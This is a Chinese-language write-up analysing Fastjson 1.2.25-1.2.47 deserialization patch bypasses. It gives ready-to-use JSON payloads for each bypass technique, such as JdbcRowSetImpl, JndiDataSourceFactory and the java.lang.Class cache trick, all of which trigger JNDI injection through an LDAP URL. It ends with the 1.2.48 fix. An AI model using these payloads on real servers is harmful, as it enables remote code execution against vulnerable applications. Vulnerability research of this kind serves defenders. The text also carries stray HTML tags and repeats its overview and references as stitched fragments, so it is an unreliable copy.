Fastjson 1.2.25-1.2.47反序列化漏洞分析<\/h1>

漏洞概述<\/h2>
Fastjson是阿里巴巴开源的一个高性能JSON处理库。在1.2.25至1.2.47版本中存在反序列化漏洞，攻击者可以通过构造恶意JSON数据实现远程代码执行。该漏洞影响范围广，危害严重。<\/p>

补丁背景<\/h2>

在Fastjson 1.2.25中引入了checkAutoType<\/code>机制来修复1.2.22-1.2.24版本的漏洞，其中autoTypeSupport<\/code>默认为False：<\/p>


当autoTypeSupport<\/code>为False时：先黑名单过滤，再白名单过滤，若白名单匹配则加载类，否则报错<\/li>
当autoTypeSupport<\/code>为True时：先白名单过滤，匹配成功则加载类，否则再黑名单过滤<\/li>
<\/ul>
补丁绕过方法<\/h2>
需要开启AutoTypeSupport的绕过方式<\/h3>
1.2.25-1.2.41版本绕过<\/h4>
Payload<\/strong>:<\/p>
{"@type"<\/span>:"Lcom.sun.rowset.JdbcRowSetImpl;"<\/span>,"dataSourceName"<\/span>:"ldap:\/\/localhost:1389\/badNameClass"<\/span>, "autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre>绕过原理<\/strong>：<\/p>

在类名前加L<\/code>和末尾加;<\/code>绕过黑名单检查<\/li>
TypeUtils.loadClass<\/code>会去除开头的L<\/code>和末尾的;<\/code>，从而加载真实类<\/li>
<\/ul>
1.2.25-1.2.42版本绕过<\/h4>
Payload<\/strong>:<\/p>
{"@type"<\/span>:"LLcom.sun.rowset.JdbcRowSetImpl;;"<\/span>,"dataSourceName"<\/span>:"ldap:\/\/localhost:1389\/badNameClass"<\/span>, "autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre>绕过原理<\/strong>：<\/p>

使用双重L<\/code>和;<\/code>绕过新增的提取操作<\/li>
TypeUtils.loadClass<\/code>会循环调用自身去除多余的L<\/code>和;<\/code><\/li>
<\/ul>
1.2.25-1.2.43版本绕过<\/h4>
Payload<\/strong>:<\/p>
{"@type"<\/span>:"[com.sun.rowset.JdbcRowSetImpl"<\/span>[{,<\/span>"dataSourceName"<\/span>:"ldap:\/\/localhost:1389\/badNameClass"<\/span>, "autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre>绕过原理<\/strong>：<\/p>

利用[<\/code>开头的类名处理逻辑<\/li>
通过Array.newInstance().getClass()<\/code>获取并返回类<\/li>
需要精确构造JSON格式满足解析条件<\/li>
<\/ul>
1.2.25-1.2.45版本绕过<\/h4>
Payload<\/strong>:<\/p>
{"@type"<\/span>:"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"<\/span>,"properties"<\/span>:{"data_source"<\/span>:"ldap:\/\/localhost:1389\/badNameClass"<\/span>}}
<\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p>

目标服务端存在mybatis的jar包<\/li>
mybatis版本为3.x.x系列且<3.5.0<\/li>
<\/ul>
绕过原理<\/strong>：<\/p>

利用不在黑名单中的JndiDataSourceFactory<\/code>类<\/li>
通过properties<\/code>参数触发JNDI注入<\/li>
<\/ul>
不需要开启AutoTypeSupport的绕过方式（1.2.25-1.2.47通杀）<\/h3>
Payload<\/strong>:<\/p>
{
<\/span><\/span>    "a"<\/span>:{
<\/span><\/span>        "@type"<\/span>:"java.lang.Class"<\/span>,
<\/span><\/span>        "val"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>
<\/span><\/span>    },
<\/span><\/span>    "b"<\/span>:{
<\/span><\/span>        "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>        "dataSourceName"<\/span>:"ldap:\/\/localhost:1389\/badNameClass"<\/span>,
<\/span><\/span>        "autoCommit"<\/span>:true<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过原理<\/strong>：<\/p>

利用java.lang.Class<\/code>将恶意类加载到Map缓存中<\/li>
第二次解析时从缓存中获取类，绕过checkAutoType<\/code>检查<\/li>
<\/ol>
版本差异<\/strong>：<\/p>

1.2.25-1.2.32：未开启AutoTypeSupport时可利用，开启则不能<\/li>
1.2.33-1.2.47：无论是否开启AutoTypeSupport都可利用<\/li>
<\/ul>
1.2.48补丁修复<\/h2>
1.2.48版本中进行了以下修复：<\/p>

将loadClass<\/code>时的缓存开关默认设置为False<\/li>
将Class<\/code>类加入黑名单<\/li>
<\/ul>
参考资源<\/h2>

Fastjson历史版本补丁绕过<\/a><\/li>
Fastjson新版本分析<\/a><\/li>
Fastjson黑名单破解<\/a><\/li>
<\/ol>

Fastjson 1.2.25-1.2.47反序列化漏洞分析<\/h1>

漏洞概述<\/h2> Fastjson是阿里巴巴开源的一个高性能JSON处理库。在1.2.25至1.2.47版本中存在反序列化漏洞，攻击者可以通过构造恶意JSON数据实现远程代码执行。该漏洞影响范围广，危害严重。<\/p>

补丁绕过方法<\/h2>

需要开启AutoTypeSupport的绕过方式<\/h3>

参考资源<\/h2> Fastjson历史版本补丁绕过<\/a><\/li> Fastjson新版本分析<\/a><\/li> Fastjson黑名单破解<\/a><\/li> <\/ol>

漏洞概述<\/h2>
Fastjson是阿里巴巴开源的一个高性能JSON处理库。在1.2.25至1.2.47版本中存在反序列化漏洞，攻击者可以通过构造恶意JSON数据实现远程代码执行。该漏洞影响范围广，危害严重。<\/p>

参考资源<\/h2>

Fastjson历史版本补丁绕过<\/a><\/li>
Fastjson新版本分析<\/a><\/li>
Fastjson黑名单破解<\/a><\/li> <\/ol>